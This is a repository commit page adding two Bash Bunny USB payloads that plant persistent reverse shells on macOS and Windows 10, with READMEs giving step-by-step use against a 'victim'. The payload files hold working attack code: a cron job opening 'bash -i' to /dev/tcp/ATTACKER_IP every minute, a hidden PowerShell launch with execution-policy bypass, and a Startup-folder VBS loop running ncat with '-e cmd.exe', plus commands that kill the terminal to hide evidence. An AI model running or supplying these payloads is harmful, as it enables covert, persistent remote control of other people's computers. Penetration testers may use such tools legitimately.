hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Persistent Reverse Shells for MacOS and Windows 10 (#306)

Browse Source
This commit is contained in:
KeenanV
2018-01-21 15:39:14 -08:00
committed by Sebastian Kinne
parent a998f5c86c
commit 7f902403d4
6 changed files with 166 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

44
payloads/library/remote_access/MacPersistentReverseShell/README.md Normal file
View File

@@ -0,0 +1,44 @@
# Reverse Shell Mac for Bash Bunny
* Author: 0dyss3us (KeenanV)
* Version: 1.2
## Description
Opens a persistent reverse shell on victim's mac and connects it back to host attacker over TCP.
* Targets MacOS
* Connection can be closed and reconnected at any time
* Deploys in roughly 23 sec
* Works well with NetCat as the listener
## Requirements
Have a working Bash Bunny :)
## STATUS
| LED | STATUS |
| -------------------- | ---------------------------- |
| Purple | Setup |
| Amber (Single Blink) | Launching Terminal |
| Amber (Double Blink) | Creating cron job |
| White (Fast Blink) | Cleaning up |
| Green | Finished |
## Configuration and Execution
1. Plug in Bash Bunny in arming mode
2. Move files from MacPersistentReverseShell to either switch folder
3. Edit the payload.txt file and replace `ATTACKER_IP` with attacker's IP and `PORT` with whichever port you like to use (I use 1337 :wink:)
5. Unplug Bash Bunny and switch it to the position the payload is loaded on
6. Plug the Bash Bunny into your victim's Mac and wait until the final light turns green (about 30 sec)
7. Unplug the Bash Bunny and go to attacker's machine
8. Listen on the port you chose in the payload.txt file on whichever program you'd like (I use NetCat)
* If using NetCat, run the command `nc -nlvp 1337` (replace the port with the port in connect.sh)
* If using Windows as the attacker machine, you must install Ncat from: http://nmap.org/dist/ncat-portable-5.59BETA1.zip and use the command `ncat` instead of `nc` from the directory that you installed ncat.exe.
9. Wait for connection (Should take no longer than 1 minute as the cron job runs every minute)
10. Once a bash shell prompt appears...YOU'RE DONE!! :smiley: and you can disconnect and reconnect to the victim at any time as long as the user is logged in
## Discussion
[Click here](https://forums.hak5.org/topic/42728-payload-mac-persistent-reverse-shell/) to access the forum post.

32
payloads/library/remote_access/MacPersistentReverseShell/payload.txt Normal file
View File

@@ -0,0 +1,32 @@
# Title: Mac Persistent Reverse Shell
# Description: Creates a persistent reverse shell on Mac victim that connects back to NetCat host
# Author: 0dyss3us (KeenanV)
# Props:
# Version: 1.2
# Category: Remote Access
# Target: MacOS
# Attackmodes: HID, Storage
# Sets attack modes and stores current switch position
LED SETUP
ATTACKMODE HID STORAGE VID_0X05AC PID_0X021E
GET_SWITCH_POSITION
# Opens the terminal
LED STAGE1
RUN OSX terminal
Q DELAY 2000
# Makes a cron job that will run once every minute
Q STRING \(crontab -l 2\>/dev/null\; echo \"\* \* \* \* \* bash -i \>\& /dev/tcp/ATTACKER_IP/PORT 0\>\&1\"\) \| crontab -
Q ENTER
Q DELAY 2000
LED CLEANUP
# Clears and kills the terminal to hide the evidence
Q STRING clear
Q ENTER
Q DELAY 500
Q STRING killall Terminal
Q ENTER
LED FINISH

45
payloads/library/remote_access/WindowsPersistentReverseShell/README.md Normal file
View File

@@ -0,0 +1,45 @@
# Windows Persistent Reverse Shell for Bash Bunny
* Author: 0dyss3us (KeenanV)
* Version: 1.1
## Description
Opens a persistent reverse shell through NetCat on victim's Windows machine and connects it back to host attacker.
* Targets Windows 10 (working on support for older versions)
* Connection can be closed and reconnected at any time
* Deploys in roughly 15-20 sec
* Works with NetCat
## Requirements
Have a working Bash Bunny :)
## STATUS
| LED | STATUS |
| -------------------- | ------------------------------ |
| Purple | Setup |
| Amber (Single Blink) | Installing and running scripts |
| Green | Finished |
## Installation and Execution
1. Plug in Bash Bunny in arming mode
2. Move files from WindowsPersistentReverseShell to either switch folder
3. Download ncat from http://nmap.org/dist/ncat-portable-5.59BETA1.zip and place the downloaded ncat.exe file in the same switch folder.
4. Edit the persistence.vbs file and replace `ATTACKER_IP` with attacker's IP and `PORT` with whichever port you like to use (I use 1337 :wink:)
5. Edit the run.ps1 file and replace `BashBunny` with the volume name of your Bash Bunny
6. Save the persistence.vbs file
7. Unplug Bash Bunny and switch it to the position the payload is loaded on
8. Plug the Bash Bunny into your victim's Windows machine and wait until the final light turns green (about 15-20 sec)
9. Unplug the Bash Bunny and go to attacker's machine
10. Listen on the port you chose in the persistence.vbs file on NetCat
* Run the command `nc -nlvp 1337` (replace the port with the port in persistence.vbs)
* If using Windows as the attacker machine, you must move the same ncat.exe file downloaded in step 3 to any directory and use the command `ncat` instead of `nc` from that directory.
11. Wait for connection (Should take no longer than 1 minute as the powershell command runs every minute)
12. Once a Windows cmd prompt appears...YOU'RE DONE!! :smiley: and you can disconnect and reconnect at any time as long as the user is logged in
## Discussion
[Click here](https://forums.hak5.org/topic/42729-payload-windows-persistent-reverse-shell/) for forum discussion

18
payloads/library/remote_access/WindowsPersistentReverseShell/payload.txt Normal file
View File

@@ -0,0 +1,18 @@
# Title: NetCat Reverse Shell Windows
# Description: Creates a persistent reverse shell on Windows and connects back to attacker through NetCat
# Author: 0dyss3us (KeenanV)
# Props:
# Version: 1.0
# Category: Remote Access
# Target: Windows 10
# Attackmodes: HID, Storage
#Sets attack mode and stores current switch position
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
#Runs Powershell script which puts a .vbs file in the startup folder and runs it
LED ATTACK
RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
LED FINISH

7
payloads/library/remote_access/WindowsPersistentReverseShell/persistence.vbs Normal file
View File

@@ -0,0 +1,7 @@
Dim ncShell
Set ncShell = WScript.CreateObject("WScript.shell")
Do while True:
ncShell.Run "powershell.exe C:\temp\ncat.exe ATTACKER_IP PORT -e cmd.exe", 0, true
WScript.Sleep(60000)
loop

20
payloads/library/remote_access/WindowsPersistentReverseShell/run.ps1 Normal file
View File

@@ -0,0 +1,20 @@
$Drive = (Get-WMIObject Win32_Volume | ? { $_.Label -eq 'BashBunny' }).name
$user = $env:UserName
$NetCatFile = $Drive + "payloads\switch1\ncat.exe"
$PersistenceFile = $Drive + "payloads\switch1\persistence.vbs"
$DestinationFile1 = "C:\temp\ncat.exe"
$DestinationFile2 = ("C:\Users\" + $user + "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\persistence.vbs")
If ((Test-Path $DestinationFile1) -eq $false){
New-Item -ItemType File -Path $DestinationFile1 -Force
}
If ((Test-Path $DestinationFile2) -eq $false){
New-Item -ItemType File -Path $DestinationFile2 -Force
}
Copy-Item -Path $NetCatFile -Destination $DestinationFile1
Copy-Item -Path $PersistenceFile -Destination $DestinationFile2
Set-Location -Path ("C:\Users\" + $user + "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup")
Start-Process cmd -ArgumentList "/c start persistence.vbs"